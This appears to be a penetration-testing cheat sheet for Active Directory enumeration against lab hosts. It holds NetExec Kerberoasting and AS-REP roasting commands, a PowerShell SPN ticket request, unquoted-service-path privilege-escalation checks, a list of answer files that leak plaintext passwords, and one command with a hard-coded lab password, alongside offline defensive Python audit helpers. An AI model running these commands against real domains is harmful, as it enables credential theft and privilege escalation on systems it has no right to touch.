Domain Enumeration
CrackMapExec / NetExec (nxc):
nxc ldap 10.10.11.187 -u USER -p PASS --kerberoast kerb
nxc ldap 10.10.11.187 -u USER -p PASS --asreproast asp
nxc ldap 10.10.11.187 -u USER -p PASS --trusted-for-delegation --admin-count --users --groups --password-not-required
nxc ldap 10.10.11.187 -u USER -p PASS -M user-desc
nxc ldap 10.10.11.187 -u USER -p PASS -M maq
nxc ldap 10.10.11.187 -u USER -p PASS -M adcs
nxc ldap 10.10.11.187 -u USER -p PASS -M laps
nxc ldap 10.10.11.187 -u USER -p PASS -M laps-signing
nxc ldap 10.10.11.187 -u USER -p PASS -M subnets
nxc ldap 10.10.11.187 -u USER -p PASS --bloodhound --collection All
Basic enum
# cmd
net accounts /domain
net user /domain
net group /domain
net view /domain
whoami /priv
# wmi
wmic process get CSName,Description,ExecutablePath,ProcessId
wmic useraccount list full
wmic netuse list full
wmic qfe get Caption,Description,HotFixId,InstalledOn
wmic startup get Caption,Command,Location,User
# wmi for privesc
## unquoted service paths: auto-start services outside C:\Windows whose PathName contains no quotes
Get-WmiObject -Class Win32_Service | Where-Object { $_.StartMode -eq 'Auto' -and $_.PathName -notlike '*C:\Windows\*' -and $_.PathName -notlike '*"*' } | Select-Object Name, DisplayName, PathName, StartMode
## map process handles to their owners to find highly privileged processes that can be attacked
$owners = @{}; Get-WmiObject -Class win32_process | ForEach-Object { $owners[$_.handle] = $_.getowner().user }
## find all service executable paths that contain a space and aren't quoted (only the part up to .exe is checked, so arguments are ignored)
$VulServices = Get-WmiObject -Class win32_service | Where-Object { ($_.pathname -ne $null) -and ($_.pathname.trim() -ne "") } | Where-Object { -not $_.pathname.StartsWith('"') } | Where-Object { -not $_.pathname.StartsWith("'") } | Where-Object { ($_.pathname.Substring(0, $_.pathname.IndexOf('.exe') + 4)) -match '.* .*' }
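The same unquoted-service-path condition as the PowerShell one-liners above, applied offline to an exported service list so a reviewer can check many hosts without running anything on them. This is an added example, not code from the original page; the records are constructed and shaped like the Name / PathName / StartMode columns of Win32_Service, and the "cut at the first .exe" rule is the same heuristic the IndexOf('.exe') check above uses.

```python
# Added example (not from the original page): offline check for unquoted
# service paths over constructed Win32_Service-style records.
import re

# Everything up to and including the first ".exe" is the executable; what
# follows is treated as arguments (same heuristic as IndexOf('.exe') above).
EXE_RE = re.compile(r"^(.*?\.exe)", re.IGNORECASE)


def executable_part(pathname):
    """Return the executable portion of a service PathName, or None if empty.

    A path that starts with a quote ends at the matching closing quote; an
    unquoted path is cut at the first '.exe' (or at the first space when the
    path has no '.exe', mirroring the PowerShell heuristic).
    """
    p = pathname.strip()
    if not p:
        return None
    if p[0] in ('"', "'"):
        end = p.find(p[0], 1)
        return p[1:end] if end > 0 else p[1:]
    m = EXE_RE.match(p)
    return m.group(1) if m else p.split()[0]


def is_unquoted_with_space(pathname):
    """True when the executable path is not quoted and contains a space,
    which is exactly what the service-path checks above look for."""
    p = pathname.strip()
    if not p or p[0] in ('"', "'"):
        return False
    return " " in executable_part(p)


def unquoted_service_paths(records, auto_only=True, skip_windows_dir=True):
    """Return (name, executable) for services whose path is unquoted and
    contains a space. By default only auto-start services outside
    C:\\Windows are reported, mirroring the WMI filter above."""
    findings = []
    for name, pathname, start_mode in records:
        if auto_only and start_mode.strip().lower() != "auto":
            continue
        if skip_windows_dir and pathname.strip().lower().startswith("c:\\windows\\"):
            continue
        if is_unquoted_with_space(pathname):
            findings.append((name, executable_part(pathname)))
    return findings


# Constructed sample export (not real hosts or services).
SAMPLE_SERVICES = [
    ("Spooler",       r"C:\Windows\System32\spoolsv.exe",              "Auto"),
    ("Backup Agent",  r"C:\Program Files\Backup Agent\agent.exe",      "Auto"),
    ("Vendor Update", r'"C:\Program Files\Vendor\update.exe" -silent', "Auto"),
    ("Legacy Sync",   r"C:\Program Files\Legacy\sync.exe --port 8080", "Manual"),
    ("Tiny",          r"C:\tiny\svc.exe",                              "Auto"),
    ("NoPath",        "",                                              "Auto"),
]

if __name__ == "__main__":
    for name, exe in unquoted_service_paths(SAMPLE_SERVICES):
        print(f"unquoted path with space: {name!r} -> {exe}")
```

Quoted paths with arguments and paths under C:\Windows are deliberately excluded, and a manual-start service only appears when `auto_only=False`, so the output matches what the WMI filter above would return for the same host.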
Domain enum
nltest /dclist:<DOMAIN>
nltest /dsgetdc:<DOMAIN> /pdc
nltest /bdc_query:<DOMAIN>
nltest /server:<DOMAIN> /trusted_domains
ldapsearch:
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
ldapsearch -x -H ldap://dc.support.htb -D 'SUPPORT\ldap' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "CN=Users,DC=SUPPORT,DC=HTB" | tee ldap_dc.support.htb.txt
LDAP dump:
ldapdomaindump -u 'DOMAIN\USER' -p 'PASSWORD' FQDN.DOMAIN.COM
Plaintext passwords
C:\unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml
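An audit helper for the answer-file locations listed above, added here as an example (not code from the original page). It checks which of those files are still present and parses an unattend XML document, reporting every element that carries credential material without decoding anything. The sample document is constructed with placeholder values; the `urn:schemas-microsoft-com:unattend` namespace is the real one used by Windows answer files, and the `exists` callable is injectable only so the path check can be exercised off a Windows host.

```python
# Added example (not from the original page): find leftover answer files and
# list the credential-bearing elements inside an unattend.xml document.
import os
import xml.etree.ElementTree as ET

NS = "{urn:schemas-microsoft-com:unattend}"

# Locations from the list above.
KNOWN_PATHS = [
    r"C:\unattend.xml",
    r"C:\Windows\Panther\Unattend.xml",
    r"C:\Windows\Panther\Unattend\Unattend.xml",
    r"C:\Windows\system32\sysprep.inf",
    r"C:\Windows\system32\sysprep\sysprep.xml",
]


def find_leftover_files(paths=KNOWN_PATHS, exists=os.path.exists):
    """Return the candidate answer files that still exist on disk."""
    return [p for p in paths if exists(p)]


def audit_unattend(xml_text):
    """List credential-bearing elements in an unattend.xml document.

    Any element whose tag ends in "Password" and has a non-empty <Value>
    child is reported with its settings pass, component and whether the
    value is marked PlainText (when false it is only base64-obfuscated,
    not encrypted). Values themselves are never returned.
    """
    root = ET.fromstring(xml_text)
    parent_of = {child: parent for parent in root.iter() for child in parent}
    findings = []
    for settings in root.iter(NS + "settings"):
        for component in settings.iter(NS + "component"):
            for elem in component.iter():
                tag = elem.tag.replace(NS, "")
                if not tag.endswith("Password"):
                    continue
                value = elem.findtext(NS + "Value") or ""
                if not value.strip():
                    continue  # empty placeholder, nothing to report
                plaintext = (elem.findtext(NS + "PlainText") or "false").strip().lower() == "true"
                parent_tag = parent_of[elem].tag.replace(NS, "")
                findings.append({
                    "pass": settings.get("pass", "?"),
                    "component": component.get("name", "?"),
                    "element": f"{parent_tag}/{tag}",
                    "plaintext": plaintext,
                })
    return findings


# Constructed answer file: the values are placeholders, not real credentials
# ("UExBQ0VIT0xERVI=" is just base64 of "PLACEHOLDER").
SAMPLE_UNATTEND = """<?xml version="1.0" encoding="utf-8"?>
<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup" processorArchitecture="amd64">
      <AutoLogon>
        <Password>
          <Value>UExBQ0VIT0xERVI=</Value>
          <PlainText>false</PlainText>
        </Password>
        <Enabled>true</Enabled>
        <Username>Administrator</Username>
      </AutoLogon>
      <UserAccounts>
        <AdministratorPassword>
          <Value>PLACEHOLDER</Value>
          <PlainText>true</PlainText>
        </AdministratorPassword>
        <LocalAccounts>
          <LocalAccount>
            <Password>
              <Value></Value>
              <PlainText>true</PlainText>
            </Password>
            <Name>svc_local</Name>
          </LocalAccount>
        </LocalAccounts>
      </UserAccounts>
    </component>
  </settings>
</unattend>
"""

if __name__ == "__main__":
    for path in find_leftover_files():
        print(f"answer file still present: {path}")
    for f in audit_unattend(SAMPLE_UNATTEND):
        print(f"{f['pass']}/{f['component']}: {f['element']} plaintext={f['plaintext']}")
```

Run on a real host, `find_leftover_files()` uses `os.path.exists` and the findings tell you which file and which element to clean up; the empty `LocalAccount` password in the sample shows that placeholders left by a sanitized build are not reported.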
Check and pull SPN tickets (requests a service ticket for one SPN so it lands in the ticket cache; the argument must be an SPN, e.g. one returned by the SPN filter below):
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList '<SERVICE>/<HOST.FQDN>'
Scripting enum
Check connected domain and DC:
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
Enumerate domain:
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
# UPDATE CREDS (drop the two credential arguments to bind as the current user)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry($SearchString, "corp.com\offsec", "lab")
# the searcher must be built from the credentialed DirectoryEntry, otherwise the creds above are never used
$Searcher = New-Object System.DirectoryServices.DirectorySearcher($objDomain)
# FILTER HERE (any filter from the "Filter by:" list)
$Searcher.filter = "(&(samAccountType=805306368)(servicePrincipalName=*))"
$Result = $Searcher.FindAll()
Foreach($obj in $Result)
{
    Foreach($prop in $obj.Properties)
    {
        $prop
    }
    Write-Host "------------------------"
}
Filter by:
AD - SPN: (&(samAccountType=805306368)(servicePrincipalName=*))
AD - Computers: (objectCategory=Computer)
AD - Contacts: (objectCategory=contact)
AD - Domain Controllers: (&(objectCategory=Computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))
AD - Exchange Recipients: (mailNickname=*)
AD - Exchange Recipients - hidden: (&(msExchHideFromAddressLists=TRUE)(!(objectClass=publicFolder)))
AD - Exchange Recipients - with FAX address: (proxyAddresses=FAX:*)
AD - Exchange Servers: (&(objectClass=msExchExchangeServer)(!(objectClass=msExchExchangeServerPolicy)))
AD - Global Catalogs: (&(objectCategory=nTDSDSA)(options:1.2.840.113556.1.4.803:=1))
AD - Groups - empty: (&(objectClass=group)(!(member=*)))
AD - Groups - security groups: (groupType:1.2.840.113556.1.4.803:=2147483648)
AD - Objects - can't be deleted: (systemFlags:1.2.840.113556.1.4.803:=-2147483648)
AD - Objects - can't be renamed: (systemFlags:1.2.840.113556.1.4.803:=134217728)
AD - Users: (&(objectCategory=person)(objectClass=user))
AD - Users (more effective): (sAMAccountType=805306368)
AD - Users - disabled: (&(sAMAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=2))
AD - Users - don't require a password: (&(sAMAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=32))
AD - Users - mail enabled: (&(sAMAccountType=805306368)(mailNickname=*))
AD - Users - password never expires: (&(sAMAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=65536))
LDAP Filters for Novell eDirectory Environments
eDirectory - NetWare Servers: (objectClass=ncpServer)
eDirectory - NetWare Volumes: (objectClass=volume)
eDirectory - ZEN Applications: (objectClass=appApplication)
LDAP Filters for all LDAP Environments (including Active Directory and eDirectory)
LDAP - Groups: (|(objectClass=group)(objectClass=groupOfNames))
LDAP - InetOrgPerson: (objectClass=inetOrgPerson)
LDAP - OUs: (objectClass=organizationalUnit)
LDAP - Users: (|(objectClass=inetOrgPerson)(objectClass=user))
LDAP - Users - with Certificates: (&(|(objectClass=inetOrgPerson)(objectClass=user))(userCertificate=*))
LDAP - Users - with Passwords: (&(objectClass=inetOrgPerson)(userPassword=*))
LDAP - Users - without mail address: (&(objectClass=inetOrgPerson)(!(mail=*)))
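A small evaluator for the filter syntax used in the list above and in the DirectorySearcher script, added here as an example (not code from the original page) so the meaning of each filter, in particular the `:1.2.840.113556.1.4.803:=` bitwise rule on userAccountControl, can be checked against sample objects offline. It handles `&`, `|`, `!`, equality, wildcard and presence matches plus the two Active Directory bitwise matching rules; the directory entries are constructed and nothing is queried. One simplification is assumed: `objectCategory` is stored as the short class name, whereas a real DC resolves `(objectCategory=Computer)` to the schema DN itself.

```python
# Added example (not from the original page): evaluate RFC 4515 filters with
# the AD bitwise matching rules against constructed directory entries.
import re

BIT_AND = "1.2.840.113556.1.4.803"  # LDAP_MATCHING_RULE_BIT_AND: all bits set
BIT_OR = "1.2.840.113556.1.4.804"   # LDAP_MATCHING_RULE_BIT_OR: any bit set


def parse_filter(text):
    """Parse a filter into ('&'|'|'|'!', [children]) or
    ('=', attr, rule_oid_or_None, value) tuples; ValueError if malformed."""
    text = text.strip()
    node, end = _parse_node(text, 0)
    if end != len(text):
        raise ValueError("trailing data after filter")
    return node


def _parse_node(s, i):
    if i >= len(s) or s[i] != "(":
        raise ValueError(f"expected '(' at offset {i}")
    i += 1
    if i < len(s) and s[i] in "&|!":
        op, i = s[i], i + 1
        children = []
        while i < len(s) and s[i] == "(":
            child, i = _parse_node(s, i)
            children.append(child)
        if i >= len(s) or s[i] != ")":
            raise ValueError(f"expected ')' at offset {i}")
        if op == "!" and len(children) != 1:
            raise ValueError("'!' takes exactly one operand, e.g. (!(member=*))")
        return (op, children), i + 1
    end = s.find(")", i)
    if end < 0:
        raise ValueError("unterminated filter item")
    attr, sep, value = s[i:end].partition("=")
    if not sep or not attr:
        raise ValueError(f"malformed item {s[i:end]!r}")
    rule = None
    if attr.endswith(":"):  # extensible match: attr:OID:=value
        attr, rule = attr[:-1].split(":", 1)
    return ("=", attr.lower(), rule, value), end + 1


def _item_matches(attr, rule, value, entry):
    values = entry.get(attr, [])
    if rule in (BIT_AND, BIT_OR):
        # AD exposes these flags as signed 32-bit ints, so -2147483648 and
        # 2147483648 name the same bit; mask both sides to 32 bits.
        mask = int(value) & 0xFFFFFFFF
        for v in values:
            bits = int(v) & 0xFFFFFFFF
            if ((bits & mask) == mask) if rule == BIT_AND else (bits & mask):
                return True
        return False
    if rule is not None:
        raise ValueError(f"unsupported matching rule {rule}")
    if value == "*":  # presence test
        return bool(values)
    pattern = ".*".join(re.escape(part) for part in value.split("*"))
    return any(re.fullmatch(pattern, str(v), re.IGNORECASE) for v in values)


def matches(node, entry):
    """Evaluate a parsed filter against one entry (lowercase attribute
    name -> list of string values, as attribute names are case-insensitive)."""
    op = node[0]
    if op == "&":
        return all(matches(child, entry) for child in node[1])
    if op == "|":
        return any(matches(child, entry) for child in node[1])
    if op == "!":
        return not matches(node[1][0], entry)
    _, attr, rule, value = node
    return _item_matches(attr, rule, value, entry)


# Constructed directory entries (not real accounts). userAccountControl:
# 512 NORMAL_ACCOUNT, 2 ACCOUNTDISABLE, 65536 DONT_EXPIRE_PASSWORD,
# 8192 SERVER_TRUST_ACCOUNT, 524288 TRUSTED_FOR_DELEGATION.
DIRECTORY = [
    {"samaccountname": ["jdoe"], "samaccounttype": ["805306368"], "objectcategory": ["person"],
     "objectclass": ["user"], "useraccountcontrol": ["512"]},
    {"samaccountname": ["old.account"], "samaccounttype": ["805306368"], "objectcategory": ["person"],
     "objectclass": ["user"], "useraccountcontrol": ["514"]},
    {"samaccountname": ["svc_sql"], "samaccounttype": ["805306368"], "objectcategory": ["person"],
     "objectclass": ["user"], "serviceprincipalname": ["MSSQLSvc/sql01.corp.example:1433"],
     "useraccountcontrol": ["66048"]},
    {"samaccountname": ["DC01$"], "samaccounttype": ["805306369"], "objectcategory": ["Computer"],
     "objectclass": ["computer"], "useraccountcontrol": ["532480"]},
]


def search(filter_text, entries=DIRECTORY):
    """Return the sorted sAMAccountNames of entries matching the filter."""
    tree = parse_filter(filter_text)
    return sorted(e["samaccountname"][0] for e in entries if matches(tree, e))


if __name__ == "__main__":
    for f in ("(&(samAccountType=805306368)(servicePrincipalName=*))",
              "(&(sAMAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=2))"):
        print(f, "->", search(f))
```

The parser insists on the strict `(!(attr=value))` form, so it also acts as a lint for filters copied from older notes that used `(!attr=value)`; a domain controller tolerates the loose form, most other LDAP servers do not.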